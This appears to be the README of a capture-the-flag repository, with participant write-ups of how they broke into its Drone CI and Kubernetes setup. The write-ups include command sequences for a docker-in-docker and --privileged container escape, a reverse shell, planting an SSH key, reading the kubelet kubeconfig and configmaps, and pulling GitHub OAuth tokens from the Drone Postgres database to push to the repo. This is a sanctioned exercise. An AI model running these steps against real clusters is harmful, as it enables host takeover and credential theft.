Hack this repo and add your name to the list above. Creativity and style encouraged in both endeavors.

      ___           ___                   ___           ___
     /\  \         /\__\      ___        /\  \         /\  \
    /::\  \       /:/  /     /\  \       \:\  \       /::\  \
   /:/\:\  \     /:/  /      \:\  \       \:\  \     /:/\:\  \
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    \:\__\        \:\__\   \/__/                      \:\__\
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      ___           ___           ___           ___           ___           ___           ___
     /\__\         /\  \         /\  \         /\__\         /\  \         /\  \         /\  \
    /:/  /        /::\  \       /::\  \       /:/  /        /::\  \       /::\  \       /::\  \
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  /::\  \ ___   /::\~\:\  \   /:/  \:\  \   /::\__\____   /::\~\:\  \   /::\~\:\  \   _\:\~\ \  \
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      \::/  /       \::/  /   \:\  \          |:|  |      \:\ \:\__\      |:|::/  /   \:\ \:\__\
      /:/  /        /:/  /     \:\  \         |:|  |       \:\ \/__/      |:|\/__/     \:\/:/  /
     /:/  /        /:/  /       \:\__\        |:|  |        \:\__\        |:|  |        \::/  /
     \/__/         \/__/         \/__/         \|__|         \/__/         \|__|         \/__/


Hack this repo and add your name to the list above. Creativity and style encouraged in both endeavors.


Its hacking, there are no rules! Though you probably shouldn't break any local laws.


Please don't interfere with anyone else trying to capture the flag.

This includes:

  • removing someone else's back door
  • removing key pivot information
  • hardening the node/service
  • removing other folks from the list or force pushing to erase history

Share your victories and tips in #ctf.

If you think you broke something, reach out to walt.

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    This abuses docker-in-docker volume mounts to open a remote shell on the Drone container itself. This hopefully better disguises the eventual --privileged escape. Once we mount the outer Drone worker, we chroot into it and create a reverse shell. From there, we spawn a privileged container, gain access to the node itself, and extract secrets from other containers running on the node.

    From the interactive remote shell, we can then freely spawn a --privileged container, mount the node's /, install an SSH key in /home/ec2-user/.ssh/authorized_keys, and discover the node's IP:

    # access the node's rootfs
    $ docker run --privileged --rm -it alpine
    $ mount /dev/nvme0n1p1 /mnt
    # install an ssh key
    $ cd /mnt/home/ec2-user/.ssh
    $ echo "<ssh public key>" >> .authorized_keys
    # discover the public IP
    $ apk add curl 
    $ curl ifconfig.me

    (not shown: accidentally hitting ctrl+c approximately 12 times and having to start over from scratch)

    Next, ssh into the node. It's a k8s node, so we can look for interesting docker containers. Looks like there's a drone server:

    $ docker ps | grep -i drone-server | grep -v pause
    243146925dfe        112b23978e25                                                            "/bin/drone-server"       17 hours ago        Up 17 hours                             k8s_server_drone-7cf8565555-wmnsw_drone_b6b3725e-223e-4793-97a7-eb07f412325c_0

    exec into it and check out the env:

    $ docker exec -it 243146925dfe sh
    $ env

    Grab the postgres connection details and return to the node. Open a postgres shell:

    $ psql -h <host> -p 5432 -U postgres
    postgres=> \dt
               List of relations
     Schema |    Name    | Type  |  Owner
     public | builds     | table | postgres
     public | cron       | table | postgres
     public | latest     | table | postgres
     public | logs       | table | postgres
     public | migrations | table | postgres
     public | nodes      | table | postgres
     public | orgsecrets | table | postgres
     public | perms      | table | postgres
     public | repos      | table | postgres
     public | secrets    | table | postgres
     public | stages     | table | postgres
     public | steps      | table | postgres
     public | users      | table | postgres
    postgres=> select user_login,user_oauth_token from users;
      user_login  |             user_oauth_token
     example | <snip>
    (1 row)

    With a github user and token, we can have some fun. Back on your own box, clone the repo over https:

    $ git clone https://github.com/danger-della/ctf.git
    $ cd ctf
    $ [... make some changes ...]
    $ git commit
    $ git push

    You'll be prompted for a username and password. Enter the username from above, and use the token as the password. The push should succeed. 🎉

  • Important features

    Important features

    My solution:
    Create this PR and get a reverse shell.
    $ mount # observe /dev/nvme0n1p1
    $ mkdir /tmp/rootfs
    $ mount /dev/nvme0n1p1 /tmp/rootfs
    $ chroot /tmp/rootfs
    $ cd /tmp
    $ curl -LO https://dl.k8s.io/release/v1.22.0/bin/linux/amd64/kubectl
    $ chmod u+x kubectl
    $ # ... mess around a bit, see where the kubernetes files are ...
    $ # kubelets do not have the permission to *list* namespaces, I guessed `drone` correctly
    $ /tmp/kubectl --kubeconfig /var/lib/kubelet/kubeconfig -v 6 -n drone get pods -o yaml 2>&1 
    $ # observe that it uses configmap `drone`
    $ /tmp/kubectl --kubeconfig /var/lib/kubelet/kubeconfig -v 6 -n drone get configmap/drone -o yaml 2>&1
    $ yum install postgresql # sorry for messing with the global state of the system
    $ psql postgres://...
    > select user_oauth_token from users;

    Then use GitHub API:

    #!/usr/bin/env python3
    from github import Github # pip install PyGithub
    g = Github("<...>snip<...>")
    repo = g.get_user().get_repos()[0]
    assert repo.name == "ctf"
    readme = next(f for f in repo.get_dir_contents("/") if f.name == "README.md")
    sha = readme.sha
    new_content = r"""
    repo.update_file("README.md", "pwned", new_content, sha)
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